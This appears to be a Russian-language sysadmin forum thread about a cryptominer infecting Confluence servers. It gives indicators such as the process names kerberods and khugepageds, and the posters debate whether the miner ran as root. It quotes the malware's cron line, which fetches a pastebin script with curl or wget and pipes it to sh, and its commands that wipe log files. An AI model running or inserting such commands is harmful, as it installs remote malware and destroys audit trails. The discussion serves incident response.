свежачек Сильно грузит проц, пытается пролезать по ssh на соседние серверы, меня это и спасло, оно полезло на сервер, где живет localDNS и гейт, там такие попытки сразу приводят к бану по ИП, т.е. сервер потерял local DNS сервис перестал рботать. У меня заразилась confluence, гребаная дырявая жаба, не знаю откуда он пролез, но даже включенный selinux позволил этой заразе прописаться в крон, т.е. запускается оно локально, из окружения юзера. Пока рекомендую проверить наличие процессов kerberods - типа керберос и khugepageds - типа khugepaged а кронтабы всех юзеров, на предмет чего-то подобного: #*/10 * * * * (curl -fsSL https://pastebin.com/raw/********||wget -q -O- https://pastebin.com/raw/********)|sh
А pastebin.com можно добавить в hosts Походу это майнер, бинарники зашифрованы, clamav со свежими базами его не нашел.
UPD: инсталится оно баш-скриптом, который выкачивает с pastebin.com (не факт, что только с него), скрипт потом лезет на несколько серверов типа pixeldrain.com и sowcar.com и вытягивает от туда типа парочку .jpeg, которые потом переименовывает в бинарники и запускает. После чего обнуляет пару логов: echo 0>/var/spool/mail/root echo 0>/var/log/wtmp echo 0>/var/log/secure echo 0>/var/log/cron т.е. эти логи будут чиститься каждые 10 мин.
sigma 11.04.2019 09:53 пишет: Судя по проявлениям, его кто-то запустил от root.
не, если бы от рута пустили - была бы бяда из рутового акка. Походу кто-то что-то залил в confluence и оно уже внутрях выполнило какой-то свой джарник, либо у кого-то на винде живет зараза, которая при/после логине в confluence что-то таки заинжектила в жабу. кака выполнялась из-под локального юзера confluence и прописывалась в его кронтабе. Но в загружаемом баш-скрипте в наличии код проверки ssh ключей в /root/.ssh/ и попытка их использования.
У меня (Ubuntu сервер) на этот файл стоит 600: igor@zebra:/var/spool/mail$ ls -la total 118448 drwxrwsrwt 2 root mail 4096 Apr 11 08:00 . drwxr-xr-x 15 root root 4096 Nov 12 2016 .. -rw-rw---- 1 igor igor 0 Mar 5 2017 igor -rw------- 1 root mail 462344 Apr 11 08:00 root igor@zebra:/var/spool/mail$
Никто, кроме root его изменить не может. Значит, если у данного скрипта это вышло, то он был запущен от root. У меня тоже крутится Confluence. Но он работает от своего, нерутового, пользователя. Что-то тут не то... Может кто-то специально или случайно подсадил?
Ну, "хотеть не значит жениться", рутовый мейл-спул на серверах у меня пустой по определению, туда кроме кронов никто не пишет, а кроны туда то же не пишут после небольшой модификации, ну и в попыхах я малость не верно написал, не "чистит", а "предпринимает попытку", логи на месте, никуда ничего не пропало, это в том смысле, что такое есть в скрипте.